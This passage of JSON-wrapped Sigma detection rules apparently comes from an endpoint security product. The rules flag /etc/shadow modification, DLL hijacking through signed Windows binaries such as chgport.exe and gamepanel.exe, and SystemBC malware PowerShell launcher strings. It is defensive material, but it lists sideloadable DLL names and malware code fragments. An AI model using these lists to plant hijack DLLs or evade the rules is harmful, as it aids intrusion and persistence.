ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n\n exclusion_containerd:\n ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_busybox_adduser:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|startswith: 'adduser '\n\n exclusion_docker:\n ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n\n exclusion_docker2:\n ProcessImage: '*/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_passwd_busybox:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine|contains:\n - 'passwd '\n - 'chown '\n - 'chpasswd '\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-applyLayer'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_salt_minion:\n - ProcessCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine|startswith:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? 
/usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_snap:\n ProcessImage:\n - '/snap/snapd/??/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/???/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/?????/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/??????/usr/lib/snapd/snap-update-ns'\n ProcessCommandLine|startswith: 'snap-update-ns'\n\n exclusion_nixos:\n ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "06168646-4339-42be-bcf4-a8f6ef23f53d", + "rule_name": "File /etc/shadow Modified", + "rule_description": "Detects a suspicious attempt to modify /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system and can be modified to change the password of a user.\nIt is recommended to ensure that both the process modifying this file and the user that requested the modification of a user's password are legitimate.\n", + "rule_creation_date": "2022-11-16", + "rule_modified_date": "2026-01-21", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.008", + "attack.t1078" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "063e3a72-3dc5-411b-8f95-7a288514f8e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.082122Z", + "creation_date": "2026-03-23T11:45:34.082124Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.082129Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_chgport.yml", + "content": "title: DLL Hijacking via chgport.exe\nid: 063e3a72-3dc5-411b-8f95-7a288514f8e5\ndescription: |\n Detects potential Windows DLL Hijacking via chgport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - 
classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chgport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "063e3a72-3dc5-411b-8f95-7a288514f8e5", + "rule_name": "DLL Hijacking via chgport.exe", + "rule_description": "Detects potential Windows DLL Hijacking via chgport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "065c4be3-1c64-4884-8239-a03e9bd028e7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.602221Z", + "creation_date": "2026-03-23T11:45:34.602224Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.602232Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_wlrmdr.yml", + "content": "title: DLL Hijacking via wlrmdr.exe\nid: 065c4be3-1c64-4884-8239-a03e9bd028e7\ndescription: |\n Detects potential Windows DLL Hijacking via wlrmdr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for 
malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wlrmdr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "065c4be3-1c64-4884-8239-a03e9bd028e7", + "rule_name": "DLL Hijacking via wlrmdr.exe", + "rule_description": "Detects potential Windows DLL Hijacking via wlrmdr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and 
the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "06851538-293b-454e-ba25-02a9d4300ca4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.609078Z", + "creation_date": "2026-03-23T11:45:34.609082Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.609090Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c", + "https://twitter.com/malmoeb/status/1571985877424816130", + "https://attack.mitre.org/techniques/T1059/001/" + ], + "name": "t1059_001_systembc_powershell_execution.yml", + "content": "title: SystemBC PowerShell Execution\nid: 06851538-293b-454e-ba25-02a9d4300ca4\ndescription: |\n Detects the execution 
of the PowerShell version of SystemBC's launcher.\n SystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\n It is recommended to investigate all the PowerShell commands associated with the process.\n It is also recommended to check the process tree for suspicious activities.\nreferences:\n - https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c\n - https://twitter.com/malmoeb/status/1571985877424816130\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/09/27\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Malware.SystemBC\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"For ($*=0; $* -ne 50; $*++) { $*[$*] =* $* }\"\n - '[string]$domain = \"{0}.{1}.{2}.{3}\" -f $a, $b, $c, $d'\n - '[void]$ps.AddParameter(\"Rc4_crypt\", $*)'\n - '[void]$ps.AddParameter(\"xordata_\", $*)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "06851538-293b-454e-ba25-02a9d4300ca4", + "rule_name": "SystemBC PowerShell Execution", + "rule_description": "Detects the execution of the PowerShell version of SystemBC's launcher.\nSystemBC is a Malware-as-a-Service framework involved in numerous ransomware attacks.\nIt is recommended to investigate all the PowerShell commands associated with the process.\nIt is also recommended to check the process tree for suspicious activities.\n", + "rule_creation_date": "2022-09-27", + "rule_modified_date": "2025-02-06", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + 
"attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1071" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "068ce414-d762-41fa-88fd-5e0df21bb756", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.081159Z", + "creation_date": "2026-03-23T11:45:34.081161Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.081166Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_chglogon.yml", + "content": "title: DLL Hijacking via chglogon.exe\nid: 068ce414-d762-41fa-88fd-5e0df21bb756\ndescription: |\n Detects potential Windows DLL Hijacking via chglogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to 
a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chglogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "068ce414-d762-41fa-88fd-5e0df21bb756", + "rule_name": "DLL Hijacking via chglogon.exe", + "rule_description": "Detects potential Windows DLL Hijacking via chglogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows 
signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "06be143e-b032-4364-923d-de4d6d136dd3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.097139Z", + "creation_date": "2026-03-23T11:45:34.097140Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.097145Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": 
"t1574_001_dll_hijacking_dsacls.yml", + "content": "title: DLL Hijacking via DSACLS.exe\nid: 06be143e-b032-4364-923d-de4d6d136dd3\ndescription: |\n Detects potential Windows DLL Hijacking via DSACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DSACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "06be143e-b032-4364-923d-de4d6d136dd3", + "rule_name": "DLL Hijacking via 
DSACLS.exe", + "rule_description": "Detects potential Windows DLL Hijacking via DSACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "06f328a3-6c34-4480-b44a-5ccfa923f899", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.081565Z", + "creation_date": "2026-03-23T11:45:34.081567Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.081571Z", + "rule_level": "high", + "rule_confidence": "strong", + 
"rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_gamepanel.yml", + "content": "title: DLL Hijacking via gamepanel.exe\nid: 06f328a3-6c34-4480-b44a-5ccfa923f899\ndescription: |\n Detects potential Windows DLL Hijacking via gamepanel.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gamepanel.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\dwmapi.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\msdrm.dll'\n - '\\uianimation.dll'\n - '\\UIAutomationCore.DLL'\n - '\\UxTheme.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n 
Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "06f328a3-6c34-4480-b44a-5ccfa923f899", + "rule_name": "DLL Hijacking via gamepanel.exe", + "rule_description": "Detects potential Windows DLL Hijacking via gamepanel.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "070c26de-9c37-4449-81eb-9d5f6a91c83b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, 
